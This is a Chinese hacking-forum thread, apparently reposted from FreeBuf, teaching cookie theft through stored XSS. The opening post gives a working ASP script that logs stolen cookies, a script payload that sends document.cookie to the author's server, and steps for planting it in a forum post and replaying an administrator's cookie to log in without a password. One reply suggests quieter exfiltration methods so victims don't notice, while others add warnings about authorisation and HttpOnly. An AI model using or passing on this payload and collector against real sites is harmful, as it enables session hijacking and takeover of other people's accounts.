查看: 3248|回复: 5

XSS获取cookie并利用

[复制链接]
发表于 2013-2-26 22:56:29 | 显示全部楼层 |阅读模式
获取cookie利用代码cookie.asp
<html>
<title>xx</title>
<body>
<%testfile = Server.MapPath("code.txt") //先构造一个路径,也就是取网站根目录,创造一个在根目录下的code.txt路径,保存在testfile中
msg = Request("msg")   //获取提交过来的msg变量,也就是cookie值
set fs = server.CreateObject("scripting.filesystemobject")//创建一个fs对象
set thisfile = fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg&"")//像code.txt中写入获取来的cookie
thisfile.close()   //关闭
set fs = nothing%>
</body>
</html>
把上述文件保存为cookie.asp文件,放到你自己的网站服务器下。比如这里我们自己搭建的服务器为:http://10.65.20.196:8080。 XSS构造语句
<script>window.open('http://10.65.20.196:8080/cookie.asp?msg='+document.cookie)</script> 把上述语句放到你找到的存在XSS的目标中,不过这里最好是存储型xss,比如你找到了某个博客或者论坛什么的存在存储型XSS,你在里面发一篇帖子或者留上你的评论,内容就是上述语句,当其他用户或者管理员打开这个评论或者帖子链接后,就会触发,然后跳转到http://10.65.20.196:8080/cookie.asp?msg=’+document.cookie的页面,然后当前账户的coolie信息就当成参数发到你的网站下的文件里了。然后的然后你就可以那这个cookie登陆了。。。。。。 简单步骤如下: 1、在存在漏洞的论坛中发日志: 2、然后以管理远登陆,进入后页面会跳转,此时cookie就发送到你的服务器下的code.txt文件中了:3、这是没有账户前的登陆界面:4、打开firefox的Tamper Data插件,点击Start Tamper开始抓取信息,刷新登陆界面,然后会跳出对话框,点击Tamper按钮,在途中的cookie一栏中替换掉你抓取到的cookie,单击确定发送请求数据:5、替换cookie后不用输用户名密码就顺利进入管理员账户了:

如文中未特别声明转载请注明出自: FreebuF.COM

图文链接  http://www.freebuf.com/articles/web/6204.html
回复

使用道具 举报

发表于 2014-2-1 05:08:44 | 显示全部楼层
好吧。。沙发
回复 支持 反对

使用道具 举报

发表于 2014-5-18 20:24:03 | 显示全部楼层
回复的人好少的样子 马克
回复 支持 反对

使用道具 举报

发表于 2026-5-21 17:25:00 | 显示全部楼层

Re: XSS获取cookie并利用

感谢分享,这篇XSS获取cookie的教程写得很清楚,实验环境搭建和利用步骤也很直观。不过还是提醒一下,这类技术只能在授权测试或自己搭建的环境里练习,千万别用到真实站点上,否则后果很严重。另外,现在很多浏览器对document.cookie的跨域读取和发送有限制,实际利用时可能需要考虑CORS、HttpOnly标志等因素,最好是带着这些细节再深入分析一下。
回复 支持 反对

使用道具 举报

发表于 2026-6-20 12:15:00 | 显示全部楼层

Re: XSS获取cookie并利用

感谢楼主的详细分享,这个XSS获取cookie并利用的教程写得很清楚,从搭建接收服务器到构造payload再到替换cookie登录,步骤都很完整。 有一个小建议想补充一下:实际攻击中,很多现代浏览器(比如Chrome)默认会限制跨域请求,`window.open`这种方式可能会被拦截或直接跳转导致用户察觉。除了用`window.open`,也可以考虑用`new Image().src=`或者`XMLHttpRequest`等方式来静默发送cookie,用户不会看到跳转动作,隐蔽性会更高。 另外,`httpOnly`标志的cookie无法通过`document.cookie`获取,所以这个方式只对没有设置`httpOnly`的cookie有效。大家在测试或防御时也可以留意一下这个属性。 再次感谢楼主的实战分享,对新手理解XSS利用很有帮助。
回复 支持 反对

使用道具 举报

发表于 2026-6-20 14:25:00 | 显示全部楼层

Re: XSS获取cookie并利用

感谢分享这个XSS利用的详细流程,代码和步骤都很清晰。不过想提醒一下,这类技术最好只在授权的渗透测试或自己的实验环境中使用,未经同意获取他人cookie可能涉及法律风险。另外,现在很多网站已经对cookie加了HttpOnly和SameSite标记,直接通过document.cookie获取可能受到限制,实际利用时可能需要更复杂的绕过方法。总之是个不错的入门案例,适合学习攻击原理和防御思路。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

Hacking Group 021A

旗下站点

态势感知中心

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

关注微信公众号

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2026-7-8 10:11 , Processed in 0.027113 second(s), 16 queries , Gzip On, Redis On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部